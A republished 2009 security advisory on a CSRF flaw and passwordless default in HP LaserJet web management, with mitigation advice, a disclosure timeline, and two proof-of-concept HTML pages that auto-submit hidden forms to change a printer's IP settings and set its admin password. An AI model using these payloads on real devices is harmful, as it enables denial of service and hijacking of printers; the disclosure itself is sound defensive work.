HP Laserjet multiple models web management CSRF

2009-03-17 / 2009-03-18
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-352

Louhi Networks Oy -= Security Advisory =- Advisory: HP LaserJet multiple models web management CSRF vulnerability & insecure default configuration Release Date: 2009-03-17 Last Modified: 2009-03-17 Authors: Henri Lindberg, CISA [henri d0t lindberg at louhi d0t fi] Application: HP Embedded Web Server Devices: HP LaserJet M1522n MFP, HP Color LaserJet 2605dtn possibly other HP products Attack type : CSRF Risk: Low Vendor Status: Issue documented in a customer notice References: http://www.louhinetworks.fi/advisory/HP_20090317.txt http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01684566 Overview: Quote from http://www.hp.com: "Increase effectiveness and productivity with an easy-to-use high-performance HP MFP. HP spherical toner and an intelligent cartridge optimise print quality and reliability. Do more with fast, high-quality print, copy, scan and fax functionality. This affordable HP MFP delivers print, copy, scan and fax functionality. Hi-Speed USB 2.0 connectivity and fast, secure networking enable you to easily share this device. Handle complex files with a 450 MHz processor and memory up to 64 MB." Details: Default configuration for the device does not require user to define password for configuration changes. Insecure out-of-the-box configuration combined with CSRF vulnerability in web management interface allows attacker to perform unwanted configuration changes through user's browser. Successful exploitation requires: 1) Out-of-the-box configuration (no management password) 2) Internal user with access to web management interface 3) Knowledge of target printer's DNS name or IP address 4) Ability to lure internal user to a malicious website or ability to inject malicious HTML/javascript to website frequented by said internal user. Simplest management interfaces contains few interesting features, most significant impact can be achieved with invalid network configuration. This results in denial-of-service condition, requiring manual reconfiguration in order to restore network connectivity. More advanced management interfaces based on the some software may contain additional features suitable for exploitation. It is recommended to check the features of management interface in order to determine the actual risk for the used product. Mitigation: 1) Set administrator password 2) Do not browse untrusted sites while logged on to the management interface Advisory timeline: 2009-02-17 Contacted vendor through e-mail. 2009-02-17 Vendor response. 2009-03-12 Vendor decides not to patch but to release a customer notice 2009-03-17 Coordinated release of information Vendor's customer notice: HP Security Notice HPSN-2009-001 rev.1 HP LaserJet Printers, HP Edgeline Printers, and HP Digital Senders - Unverified Input Proof of Concept: <html> <head><title>Network</title></head> <body onload="document.CSRF.submit();"> <FORM name="CSRF" method="post" ACTION="http://1.2.3.4/hp/device/config_result_YesNo.html/config"; style="display:none"> <input name="Clear" value="Yes"> <input name="Menu" value="NetIPChange"> <input name="Configuration" value="IPConfig=Man&amp;IPAddr=1.1.1.1&amp;SN=2.2.2.2&amp;GW=3.3.3.3&amp;WINS=0.0.0.0"> </form> </body> </html> Invalid value for "Configuration" parameter sets IP, mask and gw to 255.255.255.255 <html> <head><title>Set password</title></head> <body onload="document.CSRF.submit()"> <FORM name="CSRF" method="post" ACTION="http://1.2.3.4/hp/device/set_config_password.html/config"; style="display:none"> <INPUT type="password" name="Password" MAXLENGTH="16" VALUE="evil"> <INPUT type="password" name="ConfirmPassword" MAXLENGTH="16" VALUE="evil"> <INPUT type="hidden" VALUE="System"> </FORM> </body> <html>

References:

http://www.securityfocus.com/bid/34143
http://www.securityfocus.com/archive/1/archive/1/501884/100/0/threaded
http://www.louhinetworks.fi/advisory/HP_20090317.txt
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01684566


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top